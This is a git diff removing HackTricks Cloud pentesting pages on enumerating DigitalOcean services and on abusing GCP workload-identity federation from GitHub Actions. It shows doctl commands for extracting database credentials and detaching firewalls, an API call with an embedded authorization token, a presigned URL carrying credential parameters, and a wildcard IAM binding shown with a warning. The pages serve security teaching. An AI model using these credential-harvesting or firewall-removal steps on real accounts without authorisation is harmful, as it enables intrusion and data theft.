-{% endhint %} - -## Basic Information - -With DigitalOcean Databases, you can easily **create and manage databases in the cloud** without having to worry about the underlying infrastructure. The service offers a variety of database options, including **MySQL**, **PostgreSQL**, **MongoDB**, and **Redis**, and provides tools for administering and monitoring your databases. DigitalOcean Databases is designed to be highly scalable, reliable, and secure, making it an ideal choice for powering modern applications and websites. - -### Connections details - -When creating a database you can select to configure it **accessible from a public network**, or just from inside a **VPC**. Moreover, it request you to **whitelist IPs that can access it** (your IPv4 can be one). - -The **host**, **port**, **dbname**, **username**, and **password** are shown in the **console**. You can even download the AD certificate to connect securely. - -{% code overflow="wrap" %} -```bash -sql -h db-postgresql-ams3-90864-do-user-2700959-0.b.db.ondigitalocean.com -U doadmin -d defaultdb -p 25060 -``` -{% endcode %} - -### Enumeration - -```bash -# Databse clusters -doctl databases list - -# Auth -doctl databases get # This shows the URL with CREDENTIALS to access -doctl databases connection # Another way to egt credentials -doctl databases user list # Get all usernames and passwords - -# Dbs inside a database cluster -doctl databases db list - -# Firewall (allowed IPs), you can also add -doctl databases firewalls list - -# Backups -doctl databases backups # List backups of DB - -# Pools -doctl databases pool list # List pools of DB -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md deleted file mode 100644 index ad37aa951..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-functions.md +++ /dev/null @@ -1,88 +0,0 @@ -# DO - Functions - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Functions, also known as "DO Functions," is a serverless computing platform that lets you **run code without having to worry about the underlying infrastructure**. With DO Functions, you can write and deploy your code as "functions" that can be **triggered** via **API**, **HTTP requests** (if enabled) or **cron**. These functions are executed in a fully managed environment, so you **don't need to worry** about scaling, security, or maintenance. - -In DO, to create a function first you need to **create a namespace** which will be **grouping functions**.\ -Inside the namespace you can then create a function. - -### Triggers - -The way **to trigger a function via REST API** (always enabled, it's the method the cli uses) is by triggering a request with an **authentication token** like: - -```bash -curl -X POST "https://faas-lon1-129376a7.doserverless.co/api/v1/namespaces/fn-c100c012-65bf-4040-1230-2183764b7c23/actions/functionname?blocking=true&result=true" \ - -H "Content-Type: application/json" \ - -H "Authorization: Basic MGU0NTczZGQtNjNiYS00MjZlLWI2YjctODk0N2MyYTA2NGQ4OkhwVEllQ2t4djNZN2x6YjJiRmFGc1FERXBySVlWa1lEbUxtRE1aRTludXA1UUNlU2VpV0ZGNjNqWnVhYVdrTFg=" -``` - -To see how is the **`doctl`** cli tool getting this token (so you can replicate it), the **following command shows the complete network trace:** - -```bash -doctl serverless connect --trace -``` - -**When HTTP trigger is enabled**, a web function can be invoked through these **HTTP methods GET, POST, PUT, PATCH, DELETE, HEAD and OPTIONS**. - -{% hint style="danger" %} -In DO functions, **environment variables cannot be encrypted** (at the time of this writing).\ -I couldn't find any way to read them from the CLI but from the console it's straight forward. -{% endhint %} - -**Functions URLs** look like this: `https://.doserverless.co/api/v1/web//default/` - -### Enumeration - -```bash -# Namespace -doctl serverless namespaces list - -# Functions (need to connect to a namespace) -doctl serverless connect -doctl serverless functions list -doctl serverless functions invoke -doctl serverless functions get - -# Logs of executions -doctl serverless activations list -doctl serverless activations get # Get all the info about execution -doctl serverless activations logs # get only the logs of execution -doctl serverless activations result # get only the response result of execution - -# I couldn't find any way to get the env variables form the CLI -``` - -{% hint style="danger" %} -There **isn't metadata endpoint** from the Functions sandbox. -{% endhint %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md deleted file mode 100644 index eaba5349d..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-images.md +++ /dev/null @@ -1,45 +0,0 @@ -# DO - Images - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Images are **pre-built operating system or application images** that can be used to create new Droplets (virtual machines) on DigitalOcean. They are similar to virtual machine templates, and they allow you to **quickly and easily create new Droplets with the operating system** and applications that you need. - -DigitalOcean provides a wide range of Images, including popular operating systems such as Ubuntu, CentOS, and FreeBSD, as well as pre-configured application Images such as LAMP, MEAN, and LEMP stacks. You can also create your own custom Images, or use Images from the community. - -When you create a new Droplet on DigitalOcean, you can choose an Image to use as the basis for the Droplet. This will automatically install the operating system and any pre-installed applications on the new Droplet, so you can start using it right away. Images can also be used to create snapshots and backups of your Droplets, so you can easily create new Droplets from the same configuration in the future. - -### Enumeration - -``` -doctl compute image list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md deleted file mode 100644 index d91a05f1d..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-kubernetes-doks.md +++ /dev/null @@ -1,65 +0,0 @@ -# DO - Kubernetes (DOKS) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -### DigitalOcean Kubernetes (DOKS) - -DOKS is a managed Kubernetes service offered by DigitalOcean. The service is designed to **deploy and manage Kubernetes clusters on DigitalOcean's platform**. The key aspects of DOKS include: - -1. **Ease of Management**: The requirement to set up and maintain the underlying infrastructure is eliminated, simplifying the management of Kubernetes clusters. -2. **User-Friendly Interface**: It provides an intuitive interface that facilitates the creation and administration of clusters. -3. **Integration with DigitalOcean Services**: It seamlessly integrates with other services provided by DigitalOcean, such as Load Balancers and Block Storage. -4. **Automatic Updates and Upgrades**: The service includes the automatic updating and upgrading of clusters to ensure they are up-to-date. - -### Connection - -```bash -# Generate kubeconfig from doctl -doctl kubernetes cluster kubeconfig save - -# Use a kubeconfig file that you can download from the console -kubectl --kubeconfig=//k8s-1-25-4-do-0-ams3-1670939911166-kubeconfig.yaml get nodes -``` - -### Enumeration - -```bash -# Get clusters -doctl kubernetes cluster list - -# Get node pool of cluster (number of nodes) -doctl kubernetes cluster node-pool list - -# Get DO resources used by the cluster -doctl kubernetes cluster list-associated-resources -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md deleted file mode 100644 index 29cf44eb1..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-networking.md +++ /dev/null @@ -1,72 +0,0 @@ -# DO - Networking - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Domains - -```bash -doctl compute domain list -doctl compute domain records list -# You can also create records -``` - -### Reserverd IPs - -```bash -doctl compute reserved-ip list -doctl compute reserved-ip-action unassign -``` - -### Load Balancers - -```bash -doctl compute load-balancer list -doctl compute load-balancer remove-droplets --droplet-ids 12,33 -doctl compute load-balancer add-forwarding-rules --forwarding-rules entry_protocol:tcp,entry_port:3306,... -``` - -### VPC - -``` -doctl vpcs list -``` - -### Firewall - -{% hint style="danger" %} -By default **droplets are created WITHOUT A FIREWALL** (not like in oder clouds such as AWS or GCP). So if you want DO to protect the ports of the droplet (VM), you need to **create it and attach it**. -{% endhint %} - -```bash -doctl compute firewall list -doctl compute firewall list-by-droplet -doctl compute firewall remove-droplets --droplet-ids -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md deleted file mode 100644 index bc82b2449..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-projects.md +++ /dev/null @@ -1,49 +0,0 @@ -# DO - Projects - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -> project is just a container for all the **services** (droplets, spaces, databases, kubernetes...) **running together inside of it**.\ -> For more info check: - -{% content-ref url="../do-basic-information.md" %} -[do-basic-information.md](../do-basic-information.md) -{% endcontent-ref %} - -### Enumeration - -It's possible to **enumerate all the projects a user have access to** and all the resources that are running inside a project very easily: - -```bash -doctl projects list # Get projects -doctl projects resources list # Get all the resources of a project -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md deleted file mode 100644 index a19a48b8f..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-spaces.md +++ /dev/null @@ -1,72 +0,0 @@ -# DO - Spaces - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Spaces are **object storage services**. They allow users to **store and serve large amounts of data**, such as images and other files, in a scalable and cost-effective way. Spaces can be accessed via the DigitalOcean control panel, or using the DigitalOcean API, and are integrated with other DigitalOcean services such as Droplets (virtual private servers) and Load Balancers. - -### Access - -Spaces can be **public** (anyone can access them from the Internet) or **private** (only authorised users). To access the files from a private space outside of the Control Panel, we need to generate an **access key** and **secret**. These are a pair of random tokens that serve as a **username** and **password** to grant access to your Space. - -A **URL of a space** looks like this: **`https://uniqbucketname.fra1.digitaloceanspaces.com/`**\ -Note the **region** as **subdomain**. - -Even if the **space** is **public**, **files** **inside** of it can be **private** (you will be able to access them only with credentials). - -However, **even** if the file is **private**, from the console it's possible to share a file with a link such as `https://fra1.digitaloceanspaces.com/uniqbucketname/filename?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=DO00PL3RA373GBV4TRF7%2F20221213%2Ffra1%2Fs3%2Faws4_request&X-Amz-Date=20221213T121017Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Signature=6a183dbc42453a8d30d7cd2068b66aeb9ebc066123629d44a8108115def975bc` for a period of time: - -
- -### Enumeration - -```bash -# Unauthenticated -## Note how the region is specified in the endpoint -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com --no-sign-request s3://uniqbucketname - -# Authenticated -## Configure spaces keys as AWS credentials -aws configure -AWS Access Key ID [None]: -AWS Secret Access Key [None]: -Default region name [None]: -Default output format [None]: - -## List all buckets in a region -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com - -## List files inside a bucket -aws s3 ls --endpoint=https://fra1.digitaloceanspaces.com s3://uniqbucketname - -## It's also possible to generate authorized access to buckets from the API -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md deleted file mode 100644 index ce5d000ad..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-volumes.md +++ /dev/null @@ -1,41 +0,0 @@ -# DO - Volumes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean volumes are **block storage** devices that can be **attached to and detached from Droplets**. Volumes are useful for **storing data** that needs to **persist** independently of the Droplet itself, such as databases or file storage. They can be resized, attached to multiple Droplets, and snapshot for backups. - -### Enumeration - -``` -compute volume list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md b/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md deleted file mode 100644 index 0f902f914..000000000 --- a/pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md +++ /dev/null @@ -1,181 +0,0 @@ -# GCP - Federation Abuse - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## OIDC - Github Actions Abuse - -### GCP - -In order to give **access to the Github Actions** from a Github repo to a GCP **service account** the following steps are needed: - -* **Create the Service Account** to access from github actions with the **desired permissions:** - -```bash -projectId=FIXME -gcloud config set project $projectId - -# Create the Service Account -gcloud iam service-accounts create "github-demo-sa" -saId="github-demo-sa@${projectId}.iam.gserviceaccount.com" - -# Enable the IAM Credentials API -gcloud services enable iamcredentials.googleapis.com - -# Give permissions to SA - -gcloud projects add-iam-policy-binding $projectId \ - --member="serviceAccount:$saId" \ - --role="roles/iam.securityReviewer" -``` - -* Generate a **new workload identity pool**: - -```bash -# Create a Workload Identity Pool -poolName=wi-pool - -gcloud iam workload-identity-pools create $poolName \ - --location global \ - --display-name $poolName - -poolId=$(gcloud iam workload-identity-pools describe $poolName \ - --location global \ - --format='get(name)') -``` - -* Generate a new **workload identity pool OIDC provider** that **trusts** github actions (by org/repo name in this scenario): - -```bash -attributeMappingScope=repository # could be sub (GitHub repository and branch) or repository_owner (GitHub organization) - -gcloud iam workload-identity-pools providers create-oidc $poolName \ - --location global \ - --workload-identity-pool $poolName \ - --display-name $poolName \ - --attribute-mapping "google.subject=assertion.${attributeMappingScope},attribute.actor=assertion.actor,attribute.aud=assertion.aud,attribute.repository=assertion.repository" \ - --issuer-uri "https://token.actions.githubusercontent.com" - -providerId=$(gcloud iam workload-identity-pools providers describe $poolName \ - --location global \ - --workload-identity-pool $poolName \ - --format='get(name)') -``` - -* Finally, **allow the principal** from the provider to use a service principal: - -```bash -gitHubRepoName="repo-org/repo-name" -gcloud iam service-accounts add-iam-policy-binding $saId \ - --role "roles/iam.workloadIdentityUser" \ - --member "principalSet://iam.googleapis.com/${poolId}/attribute.${attributeMappingScope}/${gitHubRepoName}" -``` - -{% hint style="warning" %} -Note how in the previous member we are specifying the **`org-name/repo-name`** as conditions to be able to access the service account (other params that makes it **more restrictive** like the branch could also be used). - -However it's also possible to **allow all github to access** the service account creating a provider such the following using a wildcard: -{% endhint %} - -
# Create a Workload Identity Pool
-poolName=wi-pool2
-
-gcloud iam workload-identity-pools create $poolName \
-  --location global \
-  --display-name $poolName
-
-poolId=$(gcloud iam workload-identity-pools describe $poolName \
-  --location global \
-  --format='get(name)')
-
-gcloud iam workload-identity-pools providers create-oidc $poolName \
-  --project="${projectId}" \
-  --location="global" \
-  --workload-identity-pool="$poolName" \
-  --display-name="Demo provider" \
-  --attribute-mapping="google.subject=assertion.sub,attribute.actor=assertion.actor,attribute.aud=assertion.aud" \
-  --issuer-uri="https://token.actions.githubusercontent.com"
-
-providerId=$(gcloud iam workload-identity-pools providers describe $poolName \
-  --location global \
-  --workload-identity-pool $poolName \
-  --format='get(name)')
-
-# CHECK THE WILDCARD
-gcloud iam service-accounts add-iam-policy-binding "${saId}" \
-  --project="${projectId}" \
-  --role="roles/iam.workloadIdentityUser" \
-  --member="principalSet://iam.googleapis.com/${poolId}/*"
-
- -{% hint style="warning" %} -In this case anyone could access the service account from github actions, so it's important always to **check how the member is defined**.\ -It should be always something like this: - -`attribute.{custom_attribute}`:`principalSet://iam.googleapis.com/projects/{project}/locations/{location}/workloadIdentityPools/{pool}/attribute.{custom_attribute}/{value}` -{% endhint %} - -### Github - -Remember to change **`${providerId}`** and **`${saId}`** for their respective values: - -```yaml -name: Check GCP action -on: - workflow_dispatch: - pull_request: - branches: - - main - -permissions: - id-token: write - -jobs: - Get_OIDC_ID_token: - runs-on: ubuntu-latest - steps: - - id: 'auth' - name: 'Authenticate to GCP' - uses: 'google-github-actions/auth@v2.1.3' - with: - create_credentials_file: 'true' - workload_identity_provider: '${providerId}' # In the providerId, the numerical project ID (12 digit number) should be used - service_account: '${saId}' # instead of the alphanumeric project ID. ex: - activate_credentials_file: true # projects/123123123123/locations/global/workloadIdentityPools/iam-lab-7-gh-pool/providers/iam-lab-7-gh-pool-oidc-provider' - - id: 'gcloud' - name: 'gcloud' - run: |- - gcloud config set project - gcloud config set account '${saId}' - gcloud auth login --brief --cred-file="${{ steps.auth.outputs.credentials_file_path }}" - gcloud auth list - gcloud projects list - gcloud secrets list -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md b/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md deleted file mode 100644 index d94452728..000000000 --- a/pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.md +++ /dev/null @@ -1,47 +0,0 @@ -# GCP - API Keys Persistence - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## API Keys - -For more information about API Keys check: - -{% content-ref url="../gcp-services/gcp-api-keys-enum.md" %} -[gcp-api-keys-enum.md](../gcp-services/gcp-api-keys-enum.md) -{% endcontent-ref %} - -### Create new / Access existing ones - -Check how to do this in: - -{% content-ref url="../gcp-privilege-escalation/gcp-apikeys-privesc.md" %} -[gcp-apikeys-privesc.md](../gcp-privilege-escalation/gcp-apikeys-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
